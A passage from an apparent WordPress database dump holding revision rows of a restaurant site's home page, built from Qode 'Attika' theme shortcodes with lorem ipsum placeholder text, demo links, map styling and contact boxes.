open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Welcome to Attika, one of the best restaurants in the country. This is the place where food meets passion and where the world’s finest chefs are creating the culinary masterpieces that are sure to enchant all of your senses. The perfect combination of truly exquisite, delicious food, the friendly staff and the warm ambience will make you feel at home.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"156\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Nunc ullamcorper auctor leo a rutrum. Nullam non ex cursus, tincidunt quam ac, euismod dolor. Phasellus ex augue, euismod nec dui nec, efficitur blandit lectus. Mauris euismod maximus dolor, sit amet porta arcu blandit in. Praesent quis massa vitae orci tempus laoreet. Phasellus ex augue.[vc_empty_space height=\"30px\"]Maecenas vulputate commodo semper. Morbi ornare cursus nunc, a vestibulum erat dignissim vel. Quisque vitae vehicula.[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/big-chefs-recomend/\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Only the finest food &amp; great service\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"206\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"205\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Attika\r\nFine\r\nDining\r\nRestaurant</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]<a href=\"https://www.google.com/maps/place/35+Rainbow+Ridge+Dr,+Livingston,+NJ+07039,+USA/@40.8114217,-74.3334163,15.04z/data=!4m5!3m4!1s0x89c3a997640392e1:0xe5e9cdfe2711609c!8m2!3d40.8140015!4d-74.3310237\" target=\"_blank\" rel=\"noopener noreferrer\">Rainbow Ridge Dr street 35</a>\r\n<a href=\"https://www.google.com/maps/place/New+York,+NY,+USA/@40.6976637,-74.119763,11z/data=!3m1!4b1!4m5!3m4!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62!8m2!3d40.7127753!4d-74.0059728\" target=\"_blank\" rel=\"noopener noreferrer\">NY City, NY</a>[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_testimonials skin=\"\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" slider_pagination=\"no\" number=\"6\" category=\"testimonials-1\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Demo Main','','inherit','closed','closed','','4598-revision-v1','','','2021-01-26 09:17:43','2021-01-26 08:17:43','',4598,'https://www.ristorantesolymar.it/2021/01/26/4598-revision-v1/',0,'revision','',0),(4600,71,'2021-01-26 09:18:46','2021-01-26 08:18:46','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2910\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"773\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\n<p style=\"text-align: center;\">Welcome to Attika, one of the best restaurants in the country. This is the place where food meets passion and where the world’s finest chefs are creating the culinary masterpieces that are sure to enchant all of your senses. The perfect combination of truly exquisite, delicious food, the friendly staff and the warm ambience will make you feel at home.</p>\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"156\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\n\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Nunc ullamcorper auctor leo a rutrum. Nullam non ex cursus, tincidunt quam ac, euismod dolor. Phasellus ex augue, euismod nec dui nec, efficitur blandit lectus. Mauris euismod maximus dolor, sit amet porta arcu blandit in. Praesent quis massa vitae orci tempus laoreet. Phasellus ex augue.[vc_empty_space height=\"30px\"]Maecenas vulputate commodo semper. Morbi ornare cursus nunc, a vestibulum erat dignissim vel. Quisque vitae vehicula.[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/big-chefs-recomend/\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Only the finest food &amp; great service\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" 